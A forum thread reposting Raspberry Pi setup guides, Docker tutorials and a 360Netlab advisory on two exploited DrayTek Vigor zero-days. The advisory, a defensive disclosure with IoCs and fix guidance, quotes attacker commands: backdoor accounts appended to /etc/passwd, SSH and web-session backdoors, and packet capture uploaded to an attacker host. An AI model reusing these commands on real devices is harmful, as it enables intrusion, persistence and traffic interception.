    There was a security update to the Raspbian images. Now to enable ssh by default you have to place an empty filed named ssh (no extension) in the root of the card.

    1. Run Notepad

    • In a new file put in one space and nothing more
    • Click File / Save As …
    • Be sure to set Save as type to All Files (so the file is NOT saved with a .txt extension)
    • Call the file ssh and save it
    • Close the file

    Step 3. Download Notepad++

    Windows Notepad can’t handle the carriage returns in the Linux based files that we need to edit next. To do that you need to download a free tool called Notepad++.

    • Install the 64-bit version.

    Step 4. Edit config.txt

    1. In the root folder of the SD card, open config.txt in Notepad++ (right click on the file and there should be an edit option)

    • Append this line to the bottom of that file: dtoverlay=dwc2
    • Save the file

    Step 5. Edit cmdline.txt

    1. In the root folder of the SD card, open cmdline.txt in Notepad++

    • After rootwait, append this text leaving only one space between rootwait and the new text (otherwise it might not be parsed correctly):modules-load=dwc2,g_ether
    • If there was any text after the new text make sure that there is only one space between that text and the new text
    • Save the file

    On a fresh image that has never been booted, you may see extra text after rootwait. But if you boot the pi from the disk at least once, that extra text may go away. That is why you must put the new text directly after rootwait - so it doesn’t get accidentally deleted.

    Step 6. Install Bonjour

    You can find Raspberry Pi’s on your network using their hostname followed by .local (example: raspberrypi.local). But to do that in Windows you have to install the Bonjour service first.

    If you have iTunes installed on Windows you probably don’t have to do this. But if you don’t, browse to:

    Download Bonjour Print Services for Windows v2.0.2 and run the installer.

    Step 7. Boot the Pi Zero

    1. Put the SD card into the Pi Zero

    • Plug a Micro-USB cable into the data/peripherals port (the one closest to the center of the board – see picture above)
    • You do NOT need to plug in external power – it will get it from your computer
    • Plug the other end into a USB port on your computer
    • Give the Pi Zero plenty of time to bootup (can take as much as 90 seconds – or more)

    Step 8. Install Putty

    If you already have Putty installed, skipped to the next step.

    1. Browse to: https://www.putty.org

    • Download the 64-bit MSI (Windows Installer)
    • Open it to run the installer (if asked for permission, click Yes)
    • Select: Add shortcut to PuTTY on the Desktop

    Step 9. Login over USB using Putty

    This part assumes that ssh is enabled for your image and that the default user is pi with a password of raspberry.

    1. Launch Putty

    • If this is a new image, set the Host Name (or IP address) field to raspberrypi.local (if not use your-pi-host-name.local)
    • By default the Port should be set to 22 and Connection type should be set to SSH
    • Click Open
    • If you see a Security Alert select Yes
    • A new terminal window should appear prompting you for a user name
    • For user name on a new image enter: pi
    • For a new image the default password is: raspberry

    Congratulations! You can now access your Pi Zero with just a USB cable.

    Step 10. Access the network

    By default a pi attached to a Windows 10 machine via USB cable can’t access the network (unless the pi itself has been already setup for wireless or network access).

    To allow the pi to access the network through the Windows machines, do the following:

    1. Under Control Panel launch Network and Sharing Center

    • In my case my laptop is connected through Wi-Fi, so I selected the entry for my network
    • Click Properties
    • Click the Sharing tab
    • Check Allow other network users to connect through this computer’s Internet connection
    • Click OK and then Close
    • In the terminal Window opened through Putty, type ping www.google.com and verify that you are connected to the Internet
  3. Fri May 8 09:26:08 2020
    Men in Black started the conversation SSH into Pi Zero over USB.

    [attachment:5eb4c33cd6aa5]

    UPDATE: This article now covers the new security change that disables ssh access by default. The Raspbian image version has also been updated.

    This article covers setting up a Pi Zero for SSH USB access using a Mac. The Windows instructions can be found here: Headless Pi Zero SSH Access over USB (Windows).

    When you first get a Pi Zero the big question is – how do you access it? You can get a powered USB hub, USB keyboard, USB mouse and HDMI adapter. Or you can just plug it into your computer directly and access it over USB using ssh.

    These instructions are for a Raspbian Buster image that I downloaded from here:

    https://www.raspberrypi.org/downloads/raspbian/

    I’m using the lite image (no desktop) version 4.19 from June 20, 2019. I’ve also done this with an older desktop version and Jessie Lite.

    Here are my notes from walking through the process. You can find links to the original instructions in the References section below.

    Step 1. Edit the image

    To access the Pi Zero over USB you have to edit the image first.

    • If you have the SD card in your Pi Zero, power it down and remove it
    • Put the SD card in an adapter and plug it into your computer
    • On a Mac the SD card should appear on your desktop
    • Open the SD card icon to explore the contents

    Step 2. Access the micro SD card from the command line

    At a command line do the following:

    ls -ls /Volumes/

    You should see something like this:

    total 13
    8 lrwxr-xr-x  1 root   admin     1 Jul 28 09:41 Macintosh HD -> /
    5 drwxrwxrwx@ 1 mitch  staff  2560 Jul 28 11:47 boot

    The volume named boot should be the SD card with the Raspbian image on it.

    Now do this:

    ls -ls /Volumes/boot

    You should now see the contents of the root of your Raspbian boot image.

    Step 3. Enable ssh

    There was a security update to the Raspbian images. Now to enable ssh by default you have to do the following:

    touch /Volumes/boot/ssh

    This will write an empty file to the root of your Raspbian image. That will enable ssh on startup.

    Step 4. Edit config.txt

    • In the root folder of the SD card, open config.txt (/Volumes/boot/config.txt) in a text editor
    • Append this line to the bottom of it: dtoverlay=dwc2
    • Save the file

    Step 5. Edit cmdline.txt

    • In the root folder of the SD card, open cmdline.txt (/Volumes/boot/cmdline.txt) in a text editor
    • After rootwait, append this text leaving only one space between rootwait and the new text (otherwise it might not be parsed correctly): modules-load=dwc2,g_ether
    • If there was any text after the new text make sure that there is only one space between that text and the new text
    • Save the file

    On a fresh image that has never been booted, you may see extra text after rootwait. But if you boot the pi from the disk at least once, that extra text may go away. That is why you must put the new text directly after rootwait - so it doesn’t get accidentally deleted.

    Step 6. Boot the Pi Zero

    • Put the SD card into the Pi Zero
    • Plug a Micro-USB cable into the data/peripherals port (the one closest to the center of the board – see picture above)
    • You do NOT need to plug in external power – it will get it from your computer
    • Plug the other end into a USB port on your computer
    • Give the Pi Zero plenty of time to bootup (can take as much as 90 seconds – or more)
    • You can monitor the RNDIS/Ethernet Gadget status in the System Preferences / Network panel (note that the IP address listed is not the host)

    Step 7. Login over USB

    This part assumes that ssh is enabled for your image and that the default user is pi with a password of raspberry.

    • Open up a terminal window
    • Run the following commands:
       
    ssh-keygen -R raspberrypi.local
    ssh pi@raspberrypi.local
    • If the pi won’t respond, press Ctrl-C and try the last command again
    • If prompted with a warning just hit enter to accept the default (Yes)
    • Type in the password – by default this is raspberry

    Congratulations! You can now access your Pi Zero with just a USB cable.

  4. Fri May 8 09:24:43 2020
    Men in Black started the conversation How to Install an OS on a Raspberry Pi .

    [attachment:5eb4c16a66891]

    There are several Raspberry Pi models to use, but the Raspberry Pi 3 Model B+ is the newest, fastest, and easiest to use for beginners. The Raspberry Pi 3 Model B+ comes with Wi-Fi and Bluetooth already installed, , so besides the initial setup, you don’t need to install additional drivers or Linux dependencies. The Raspberry Pi Zero and Zero W are smaller and require less power, but they are better suited for portable projects. Generally, it is easier to start off using a Raspberry Pi 3 and move onto the Raspberry Pi Zero when you find more use-case scenarios for Raspberry Pi.

    Items you need

    Here’s all the items you need to get started with the Raspberry Pi:

    1. A Raspberry Pi 3 Model B+
    2. A micro USB power supply with at least 2.5 amps (any cell phone charger using micro USB works)
    3. A micro SD card with at least 8 GB of space. 16 GB and 32 GB micro SD cards are the perfect size as they provide enough space for the operating system you are installing, plus plenty of free space for other files you want to add at a later time.
    4. A USB mouse and USB keyboard for initial setup
    5. A TV or computer screen that you can connect to via HDMI

    There are other optional extras, including a case for your Raspberry Pi, an ethernet cable, and headphones or speakers. A case is important for your Raspberry Pi to protect it from drops. I dropped a Raspberry Pi and managed to crack the board entirely, forcing me to purchase another one. A case is not required, but it is good to have just “in case.” Larger Raspberry Pi models, excluding the Raspberry Pi Zero and Zero W, have a standard Ethernet port to directly to your router. For connecting the Raspberry Pi Zero to the internet, you need a USB-to-Ethernet adaptor. Thankfully, the Raspberry Pi 3 Model B+ and Pi Zero W can wirelessly connect to your Wi-Fi. I still connect the Ethernet cable from my Raspberry Pi to the router just in case there are any internet connectivity issues. I have not found a use for adding sound to my Raspberry Pi yet, but if I need to output sound there is an 3.5mm headphone jack available on the Raspberry Pi 3 Model B+.

    Once you have all the needed components, you need to setup your microSD card. The microSD card contains the operating system and files needed to operate. Without a microSD card, your Raspberry Pi will not function.

    List of Operating Systems

    Here is a list of all of the operating systems that you can install and run reliably on a Raspberry Pi.

    The Raspberry Pi Organization prefers you use Raspbian , which is a Linux-based operating system that was built specifically for the Raspberry Pi. There is also NOOBS , which is an easier for beginners, we will use NOOBS to install on a microSD card for this example.

    Download NOOBS

    Here are the steps you need to follow to install and run NOOBS on a microSD card.

    Go to the Raspberry Pi downloads page.
    Click the NOOBS box where indicated by the red arrow.

    [attachment:5eb4c24d0354b]

    Download the NOOBS.zip file as indicated by the green arrow.

    [attachment:5eb4c25e2f200]

    Save NOOBS.zip in a place where you can easily access it later. Once the microSD card is properly formatted, you will need to extract NOOBS from the zip archive and copy it to the microSD card.

    Format the microSD card

    Now, you need to prepare the microSD card. The best way to prepare the microSD card is to use SD Formatter. SD Formatter is the official SD card formatting tool provided by the SD Association, it is available for Windows or Mac and can be downloaded from here .

    Once installed, use SD Formatter to format your SD card. If your computer has a microSD card slot, you can put the card in there to format it. Otherwise you will need to use a USB microSD card reader. Once formatted, you are ready to extract and copy the files from NOOBS.zip to your microSD card.

    Here’s what you need to do to extract the files from NOOBS.zip and copy the files to your microSD card.

    1. Find the NOOBS.zip file that you downloaded.
    2. Right-click NOOBS.zip and choose extract the files.
    3. Once the files are extracted, copy all the files to your microSD card as shown.

    [attachment:5eb4c29a4c9fc]

    Once the files are copied, eject the microSD card from your computer. Now, it’s time to put the microSD card, the USB keyboard, the USB mouse, the HDMI cable to a supported TV or monitor, and lastly the power source in the Raspberry Pi and power it up.

    Connect everything to the Raspberry Pi

    [attachment:5eb4c2d76c5dd]

    As a general rule, I always connect the power source to the Raspberry Pi last because the OS is on the microSD card and there might be issues registering peripherals if they are connected after the OS boots from the microSD card. That’s another thing to keep in mind the Raspberry Pi doesn’t have a power switch. You can install a power switch and a portable battery supply too, but those are projects for another time. the only way to power the Raspberry Pi on and off is via the OS, or by disconnecting the power source.

    Once you power up your Raspberry Pi, you should see two lights. Red indicates that there is power and the green light should be blinking, indicating that the Raspberry Pi is reading the NOOBS files on the microSD card and then you will be brought to the Raspian desktop to finish the setup process. You’re all done!

  5. 5 months ago
    Sat Mar 28 12:56:27 2020
    Men in Black started the conversation Two zero days are Targeting DrayTek Broadband CPE Devices.

    [attachment:5e7ee474dde24]

    Background

    From December 4, 2019, 360Netlab Threat Detection System has observed two different attack groups using two 0-day vulnerabilities of DrayTek[1] Vigor enterprise routers and switch devices to conduct a series of attacks, including eavesdropping on device’s network traffic, running SSH services on high ports, creating system backdoor accounts, and even creating a specific Malicious Web Session backdoor.

    On December 25, 2019, due to the highly malicious nature of the attack, we disclosed on Twitter[2] [3] the ongoing 0-day attack IoC without mentioning the vendor name or product lines. We also provided more details to some national CERTs.

    On February 10, 2020, the manufacturer DrayTek issued a security bulletin[4] , which fixed the vulnerability and released the latest firmware program 1.5.1. (here we actually have an easter egg we might talk about later)

    Vulnerability analysis

    With the help of 360 Firmware Total system [5] , we are able to perform vulnerability research . The two 0-day vulnerability command injection points are keyPath and rtick, located in the /www/cgi-bin/mainfunction.cgi, and the corresponding Web Server program is /usr/sbin/lighttpd.

    keyPath command injection vulnerability analysis

    Vulnerability type: unauthorized remote command execution vulnerability
    Vulnerability details: Two account password transmission methods are supported by the DrayTek devices, plain text and RSA encrypted transmission.
    For RSA encrypted transmission, the interaction logic is:

    1. The web front end uses the RSA public key to encrypt the username and password, and uses a keyPath field to specify the file suffix of the RSA private key to initiate a login request;
    2. When the formLogin() function in the /www/cgi-bin/mainfunction.cgi detects that the keyPath field is not empty, the decryption starts;
    3. formLogin() uses the keyPath as input to craft the following path /tmp/rsa/private_key_<keyPath> as the RSA private key;
    4. formLogin() performs Base64 decode on the username and password fields, writes them to the /tmp/rsa/binary_loginfile, and executes the following command to decrypt the username and password
       openssl rsautl -inkey '/tmp/rsa/private_key_<keyPath>' -decrypt -in /tmp/rsa/binary_login

    5. Finally, the formLogin() function takes the decrypted user name and password to continue the verification.

    The issue here is that keyPath does not have very strong input control, which makes unauthorized remote command execution possible.

    Bug fix: In version 1.5.1, keyPath sets the field length a limit of 30, and the content must be hexadecimal characters.

    [attachment:5e7ee59c05d34]

    rtick command injection vulnerability analysis

    Vulnerability Type: unauthorized remote command execution vulnerability
    Vulnerability details: When /www/cgi-bin/mainfunction.cgi needs to access verification code, it calls the function formCaptcha(), the function does not check the incoming timestamp from rtick, and calls /usr/sbin/captcha directly to generate <rtick>.gif the CAPTCHA image, which makes command injection possible.

    Bug fix: In version 1.5.1, the vendor limits the rtick field to use only [0-9].

    [attachment:5e7ee5d601177]

    Analysis of wild 0-day attacks

    Attack Group A

    1. Attacker A uses the keyPath command injection vulnerability to download and execute the http://103.82.143.51:58172/vig/tcpst1 script, and then further downloads and executes the following script.

    http://103.82.143.51:58172/vi1
    http://103.82.143.51:58172/vig/mailsend.sh1

    2. The script /etc/mailsend.sh is used to eavesdrop on all network interfaces on the DrayTek Vigor network device to listen on the ports 21, 25, 143, and 110. The tcpdump command /usr/sbin/tcpdump -i any -n -nn port 21 or port 25 or port 143 or port 110 -s 65535 -w /data/firewall.pcap & runs in the background, and a crontab is in place to upload the captured packets to https://103.82.143.51:58443/uploLSkciajUS.php every Monday, Wednesday, Friday at 0:00.

    Attack group B

    1. Attacker B uses the rtick command injection vulnerability to create 2 sets of Web Session backdoors that never expires in the file /var/session.json

    json -f /var/session.json set 7:CBZD1SOMBUHVAF34TPDGURT9RTMLRUDK username=sadmin level=7 lasttime=0 updatetime=0 | sed -i s/""\""0\""""/""0""/g /var/session.json | sed -i s/""\""7\""""/""7""/g /var/session.json
    json -f /var/session.json set 7:R8GFPS6E705MEXZWVQ0IB1SM7JTRVE57 username=sadmin level=7 lasttime=0 updatetime=0 | sed -i s/""\""0\""""/""0""/g /var/session.json | sed -i s/""\""7\""""/""7""/g /var/session.json

    2. Attacker B further creates SSH backdoors on TCP / 22335 and TCP / 32459;

    /usr/sbin/dropbear -r /etc/config/dropbear_rsa_host_key -p 22335 | iptables -I PPTP_CTRL 1 -p tcp --dport 22335 -j ACCEPT
    /usr/sbin/dropbear -r /etc/config/dropbear_rsa_host_key -p 32459 | iptables -I PPTP_CTRL 1 -p tcp --dport 32459 -j ACCEPT

    3. A system backdoor account wuwuhanhan:caonimuqin is added as well.

    sed -i /wuwuhanhan:/d /etc/passwd ; echo 'wuwuhanhan:$1$3u34GCgO$9Pklx3.3OVwbIBja/CzZN/:500:500:admin:/tmp:/usr/bin/clish' >> /etc/passwd ; cat /etc/passwd;
    sed -i /wuwuhanhan:/d /etc/passwd ; echo 'wuwuhanhan:$1$sbIljOP5$vacGOLqYAXcw3LWek9aJQ.:500:500:admin:/tmp:/usr/bin/clish' >> /etc/passwd ; cat /etc/passwd;

    Web Session backdoor

    When we study the 0-day PoC, we noticed that when the session parameter updatetime is set to 0, DrayTek Vigor network device never logs out unless the device is rebooted.
    (aka Auto-Logout: Disable)

    [attachment:5e7ee69e17857]

    Timeline

    2019/12/04 We discovered ongoing attacks using the DrayTek Vigor 0-day keyPath vulnerability
    2019/12/08 We reached out to a channel to report the vulnerability (but only later on found it did not work out)
    2019/12/25 We disclosed on twitter the IoC and provided more details to some national CERTs.
    2020/01/28 We discovered ongoing attacks using the DrayTek Vigor 0-day rtick vulnerability
    2020/02/01 MITRE published the CVE-2020-8515
    2020/02/10 DrayTek released a security bulletin and the latest firmware fix.

    Affected firmware list

    Vigor2960           <  v1.5.1
    Vigor300B           <  v1.5.1
    Vigor3900           <  v1.5.1
    VigorSwitch20P2121  <= v2.3.2
    VigorSwitch20G1280  <= v2.3.2
    VigorSwitch20P1280  <= v2.3.2
    VigorSwitch20G2280  <= v2.3.2
    VigorSwitch20P2280  <= v2.3.2

    Suggestions

    We recommend that DrayTek Vigor users check and update their firmwares in a timely manner, and check whether there is a tcpdump process, SSH backdoor account, Web Session backdoor, etc on their systems.

    We recommend the following IoCs to be monitored and blocked on the networks where it is applicable.

    MD5

    7c42b66ef314c466c1e3ff6b35f134a4
    01946d5587c2774418b5a6c181199099
    d556aa48fa77040a03ab120b4157c007

    URL

    http://103.82.143.51:58172/vig/tcpst1
    http://103.82.143.51:58172/vi1
    http://103.82.143.51:58172/vig/mailsend.sh1
    https://103.82.143.51:58443/LSOCAISJDANSB.php
    https://103.82.143.51:58443/uploLSkciajUS.php

    Scanner IP

    103.82.143.51       	Korea                   ASN136209           	Korea Fast Networks 
    178.151.198.73      	Ukraine             	ASN13188            	Content Deli

    https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/

  6. 6 months ago
    Fri Mar 13 07:58:01 2020
    Men in Black started the conversation How To Install and Use Docker Compose on CentOS 7.

    [attachment:5e6ad832a0a85]

    Introduction

    Docker is a great tool for automating the deployment of Linux applications inside software containers, but to really take full advantage of its potential it’s best if each component of your application runs in its own container. For complex applications with a lot of components, orchestrating all the containers to start up and shut down together (not to mention talk to each other) can quickly become unwieldy.

    The Docker community came up with a popular solution called Fig, which allowed you to use a single YAML file to orchestrate all your Docker containers and configurations. This became so popular that the Docker team decided to make Docker Compose based on the Fig source, which is now deprecated. Docker Compose makes it easier for users to orchestrate the processes of Docker containers, including starting up, shutting down, and setting up intra-container linking and volumes.

    In this tutorial, you will install the latest version of Docker Compose to help you manage multi-container applications, and will explore the basic commands of the software.

    Docker and Docker Compose Concepts

    Using Docker Compose requires a combination of a bunch of different Docker concepts in one, so before we get started let’s take a minute to review the various concepts involved. If you’re already familiar with Docker concepts like volumes, links, and port forwarding then you might want to go ahead and skip on to the next section.

    Docker Images

    Each Docker container is a local instance of a Docker image. You can think of a Docker image as a complete Linux installation. Usually a minimal installation contains only the bare minimum of packages needed to run the image. These images use the kernel of the host system, but since they are running inside a Docker container and only see their own file system, it’s perfectly possible to run a distribution like CentOS on an Ubuntu host (or vice-versa).

    Most Docker images are distributed via the Docker Hub, which is maintained by the Docker team. Most popular open source projects have a corresponding image uploaded to the Docker Registry, which you can use to deploy the software. When possible, it’s best to grab “official” images, since they are guaranteed by the Docker team to follow Docker best practices.

    Communication Between Docker Images

    Docker containers are isolated from the host machine, meaning that by default the host machine has no access to the file system inside the Docker container, nor any means of communicating with it via the network. This can make configuring and working with the image running inside a Docker container difficult.

    Docker has three primary ways to work around this. The first and most common is to have Docker specify environment variables that will be set inside the Docker container. The code running inside the Docker container will then check the values of these environment variables on startup and use them to configure itself properly.

    Another commonly used method is a Docker data volume. Docker volumes come in two flavors — internal and shared.

    Specifying an internal volume just means that for a folder you specify for a particular Docker container, the data will be persisted when the container is removed. For example, if you wanted to make sure your log files persisted you might specify an internal /var/log volume.

    A shared volume maps a folder inside a Docker container onto a folder on the host machine. This allows you to easily share files between the Docker container and the host machine.

    The third way to communicate with a Docker container is via the network. Docker allows communication between different Docker containers via links, as well as port forwarding, allowing you to forward ports from inside the Docker container to ports on the host server. For example, you can create a link to allow your WordPress and MariaDB Docker containers to talk to each other and use port-forwarding to expose WordPress to the outside world so that users can connect to it.

    Prerequisites

    To follow this article, you will need the following:

    • CentOS 7 server, set up with a non-root user with sudo privileges

    Once these are in place, you will be ready to follow along.

    Step 1 — Installing Docker Compose

    In order to get the latest release, take the lead of the Docker docs and install Docker Compose from the binary in Docker’s GitHub repository.

    Check the current release and if necessary, update it in the command below:

        sudo curl -L "https://github.com/docker/compose/releases/download/1.23.2/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose

    Next, set the permissions to make the binary executable:

       sudo chmod +x /usr/local/bin/docker-compose

    Then, verify that the installation was successful by checking the version:

       docker-compose --version

    This will print out the version you installed:

    Output
    docker-compose version 1.23.2, build 1110ad01

    Now that you have Docker Compose installed, you’re ready to run a “Hello World” example.

    Step 2 — Running a Container with Docker Compose

    The public Docker registry, Docker Hub, includes a simple “Hello World” image for demonstration and testing. It illustrates the minimal configuration required to run a container using Docker Compose: a YAML file that calls a single image.

    First, create a directory for our YAML file:

       mkdir hello-world

    Then change into the directory:

       cd hello-world

    Now create the YAML file using your favorite text editor. This tutorial will use Vi:

       vi docker-compose.yml

    Enter insert mode, by pressing i, then put the following contents into the file:

    docker-compose.yml
    
    my-test:
      image: hello-world

    The first line will be part of the container name. The second line specifies which image to use to create the container. When you run the command docker-compose up it will look for a local image by the name specified, hello-world.

    With this in place, hit ESC to leave insert mode. Enter :x then ENTER to save and exit the file.

    To look manually at images on your system, use the docker images command:

        docker images

    When there are no local images at all, only the column headings display:

    Output
    REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE

    Now, while still in the ~/hello-world directory, execute the following command to create the container:

       docker-compose up

    The first time we run the command, if there’s no local image named hello-world, Docker Compose will pull it from the Docker Hub public repository:

    Output
    Pulling my-test (hello-world:)...
    latest: Pulling from library/hello-world
    1b930d010525: Pull complete
    . . .

    After pulling the image, docker-compose creates a container, attaches, and runs the hello program, which in turn confirms that the installation appears to be working:

    Output
    . . .
    Creating helloworld_my-test_1...
    Attaching to helloworld_my-test_1
    my-test_1 | 
    my-test_1 | Hello from Docker.
    my-test_1 | This message shows that your installation appears to be working correctly.
    my-test_1 | 
    . . .

    It will then print an explanation of what it did:

    Output
    . . .
    my-test_1  | To generate this message, Docker took the following steps:
    my-test_1  |  1. The Docker client contacted the Docker daemon.
    my-test_1  |  2. The Docker daemon pulled the "hello-world" image from the Docker Hub.
    my-test_1  |     (amd64)
    my-test_1  |  3. The Docker daemon created a new container from that image which runs the
    my-test_1  |     executable that produces the output you are currently reading.
    my-test_1  |  4. The Docker daemon streamed that output to the Docker client, which sent it
    my-test_1  |     to your terminal.
    . . .

    Docker containers only run as long as the command is active, so once hello finished running, the container stops. Consequently, when you look at active processes, the column headers will appear, but the hello-world container won’t be listed because it’s not running:

        docker ps
    
    Output
    CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS                      PORTS               NAMES

    Use the -a flag to show all containers, not just the active ones:

        docker ps -a
    
    Output
    CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS                      PORTS               NAMES
    50a99a0beebd        hello-world         "/hello"            3 minutes ago       Exited (0) 3 minutes ago                       hello-world_my-test_1

    Now that you have tested out running a container, you can move on to exploring some of the basic Docker Compose commands.

    Step 3 — Learning Docker Compose Commands

    To get you started with Docker Compose, this section will go over the general commands that the docker-compose tool supports.

    The docker-compose command works on a per-directory basis. You can have multiple groups of Docker containers running on one machine — just make one directory for each container and one docker-compose.yml file for each directory.

    So far you’ve been running docker-compose up on your own, from which you can use CTRL-C to shut the container down. This allows debug messages to be displayed in the terminal window. This isn’t ideal though; when running in production it is more robust to have docker-compose act more like a service. One simple way to do this is to add the -d option when you up your session:

       docker-compose up -d

    docker-compose will now fork to the background.

    To show your group of Docker containers (both stopped and currently running), use the following command:

       docker-compose ps -a

    If a container is stopped, the State will be listed as Exited, as shown in the following example:

    Output
            Name            Command   State    Ports
    ------------------------------------------------
    hello-world_my-test_1   /hello    Exit 0        

    A running container will show Up:

    Output
         Name              Command          State        Ports      
    ---------------------------------------------------------------
    nginx_nginx_1   nginx -g daemon off;   Up      443/tcp, 80/tcp 

    To stop all running Docker containers for an application group, issue the following command in the same directory as the docker-compose.yml file that you used to start the Docker group:

       docker-compose stop

    Note: docker-compose kill is also available if you need to shut things down more forcefully.

    In some cases, Docker containers will store their old information in an internal volume. If you want to start from scratch you can use the rm command to fully delete all the containers that make up your container group:

    docker-compose rm

    If you try any of these commands from a directory other than the directory that contains a Docker container and .yml file, it will return an error:

    Output
    ERROR:
            Can't find a suitable configuration file in this directory or any
            parent. Are you in the right directory?
    
            Supported filenames: docker-compose.yml, docker-compose.yaml

    This section has covered the basics of how to manipulate containers with Docker Compose. If you needed to gain greater control over your containers, you could access the filesystem of the Docker container and work from a command prompt inside your container, a process that is described in the next section.

    Step 4 — Accessing the Docker Container Filesystem

    In order to work on the command prompt inside a container and access its filesystem, you can use the docker exec command.

    The “Hello World” example exits after it runs, so to test out docker exec, start a container that will keep running. For the purposes of this tutorial, use the Nginx image from Docker Hub.

    Create a new directory named nginx and move into it:

        mkdir ~/nginx
        cd ~/nginx

    Next, make a docker-compose.yml file in your new directory and open it in a text editor:

       vi docker-compose.yml

    Next, add the following lines to the file:

    [b]~/nginx/docker-compose.yml[/b]
    
    nginx:
      image: nginx

    Save the file and exit. Start the Nginx container as a background process with the following command:

       docker-compose up -d

    Docker Compose will download the Nginx image and the container will start in the background.

    Now you will need the CONTAINER ID for the container. List all of the containers that are running with the following command:

       docker ps

    You will see something similar to the following:

    Output of `docker ps`
    CONTAINER ID        IMAGE               COMMAND                  CREATED             STATUS              PORTS               NAMES
    b86b6699714c        nginx               "nginx -g 'daemon of…"   20 seconds ago      Up 19 seconds       80/tcp              nginx_nginx_1

    If you wanted to make a change to the filesystem inside this container, you’d take its ID (in this example b86b6699714c) and use docker exec to start a shell inside the container:

       docker exec -it b86b6699714c /bin/bash

    The -t option opens up a terminal, and the -i option makes it interactive. /bin/bash opens a bash shell to the running container.

    You will then see a bash prompt for the container similar to:

    root@b86b6699714c:/#

    From here, you can work from the command prompt inside your container. Keep in mind, however, that unless you are in a directory that is saved as part of a data volume, your changes will disappear as soon as the container is restarted. Also, remember that most Docker images are created with very minimal Linux installs, so some of the command line utilities and tools you are used to may not be present.

  7. Fri Mar 13 07:43:52 2020
    Men in Black started the conversation How To Install and Use Docker on CentOS 7.

    Introduction

    Docker is an application that makes it simple and easy to run application processes in a container, which are like virtual machines, only more portable, more resource-friendly, and more dependent on the host operating system. For a detailed introduction to the different components of a Docker container, check out The Docker Ecosystem: An Introduction to Common Components.

    There are two methods for installing Docker on CentOS 7. One method involves installing it on an existing installation of the operating system. The other involves spinning up a server with a tool called Docker Machine that auto-installs Docker on it.

    In this tutorial, you’ll learn how to install and use it on an existing installation of CentOS 7.

    Prerequisites

    • 64-bit CentOS 7 Droplet
    • Non-root user with sudo privileges. A CentOS 7 server set up using Initial Setup Guide for CentOS 7 explains how to set this up.

    Note: Docker requires a 64-bit version of CentOS 7 as well as a kernel version equal to or greater than 3.10. The default 64-bit CentOS 7 Droplet meets these requirements.

    All the commands in this tutorial should be run as a non-root user. If root access is required for the command, it will be preceded by sudo. Initial Setup Guide for CentOS 7 explains how to add users and give them sudo access.

    Step 1 — Installing Docker

    The Docker installation package available in the official CentOS 7 repository may not be the latest version. To get the latest and greatest version, install Docker from the official Docker repository. This section shows you how to do just that.

    But first, let’s update the package database:
    Now run this command. It will add the official Docker repository, download the latest version of Docker, and install it:

       curl -fsSL https://get.docker.com/ | sh

    After installation has completed, start the Docker daemon:

       sudo systemctl start docker

    Verify that it’s running:

       sudo systemctl status docker

    The output should be similar to the following, showing that the service is active and running:

    Output
    ● docker.service - Docker Application Container Engine
       Loaded: loaded (/lib/systemd/system/docker.service; enabled; vendor preset: enabled)
       Active: active (running) since Sun 2016-05-01 06:53:52 CDT; 1 weeks 3 days ago
         Docs: https://docs.docker.com
     Main PID: 749 (docker)

    Lastly, make sure it starts at every server reboot:

       sudo systemctl enable docker

    Installing Docker now gives you not just the Docker service (daemon) but also the docker command line utility, or the Docker client. We’ll explore how to use the docker command later in this tutorial.

    Step 2 — Executing Docker Command Without Sudo (Optional)

    By default, running the docker command requires root privileges — that is, you have to prefix the command with sudo. It can also be run by a user in the docker group, which is automatically created during the installation of Docker. If you attempt to run the docker command without prefixing it with sudo or without being in the docker group, you’ll get an output like this:

    Output
    docker: Cannot connect to the Docker daemon. Is the docker daemon running on this host?.
    See 'docker run --help'.

    If you want to avoid typing sudo whenever you run the docker command, add your username to the docker group:

       sudo usermod -aG docker $(whoami)

    You will need to log out of the Droplet and back in as the same user to enable this change.

    If you need to add a user to the docker group that you’re not logged in as, declare that username explicitly using:

       sudo usermod -aG docker username

    The rest of this article assumes you are running the docker command as a user in the docker user group. If you choose not to, please prepend the commands with sudo.

    Step 3 — Using the Docker Command

    With Docker installed and working, now’s the time to become familiar with the command line utility. Using docker consists of passing it a chain of options and subcommands followed by arguments. The syntax takes this form:

       docker [option] [command] [arguments]

    To view all available subcommands, type:

       docker

    As of Docker 1.11.1, the complete list of available subcommands includes:

    Output
        attach    Attach to a running container
        build     Build an image from a Dockerfile
        commit    Create a new image from a container's changes
        cp        Copy files/folders between a container and the local filesystem
        create    Create a new container
        diff      Inspect changes on a container's filesystem
        events    Get real time events from the server
        exec      Run a command in a running container
        export    Export a container's filesystem as a tar archive
        history   Show the history of an image
        images    List images
        import    Import the contents from a tarball to create a filesystem image
        info      Display system-wide information
        inspect   Return low-level information on a container or image
        kill      Kill a running container
        load      Load an image from a tar archive or STDIN
        login     Log in to a Docker registry
        logout    Log out from a Docker registry
        logs      Fetch the logs of a container
        network   Manage Docker networks
        pause     Pause all processes within a container
        port      List port mappings or a specific mapping for the CONTAINER
        ps        List containers
        pull      Pull an image or a repository from a registry
        push      Push an image or a repository to a registry
        rename    Rename a container
        restart   Restart a container
        rm        Remove one or more containers
        rmi       Remove one or more images
        run       Run a command in a new container
        save      Save one or more images to a tar archive
        search    Search the Docker Hub for images
        start     Start one or more stopped containers
        stats     Display a live stream of container(s) resource usage statistics
        stop      Stop a running container
        tag       Tag an image into a repository
        top       Display the running processes of a container
        unpause   Unpause all processes within a container
        update    Update configuration of one or more containers
        version   Show the Docker version information
        volume    Manage Docker volumes
        wait      Block until a container stops, then print its exit code

    To view the switches available to a specific command, type:

       docker docker-subcommand --help

    To view system-wide information, use:

       docker info

    Step 4 — Working with Docker Images

    Docker containers are run from Docker images. By default, it pulls these images from Docker Hub, a Docker registry managed by Docker, the company behind the Docker project. Anybody can build and host their Docker images on Docker Hub, so most applications and Linux distributions you’ll need to run Docker containers have images that are hosted on Docker Hub.

    To check whether you can access and download images from Docker Hub, type:

       docker run hello-world

    The output, which should include the following, should indicate that Docker in working correctly:

    Output
    Hello from Docker.
    This message shows that your installation appears to be working correctly.
    ...

    You can search for images available on Docker Hub by using the docker command with the search subcommand. For example, to search for the CentOS image, type:

       docker search centos

    The script will crawl Docker Hub and return a listing of all images whose name match the search string. In this case, the output will be similar to this:

    Output
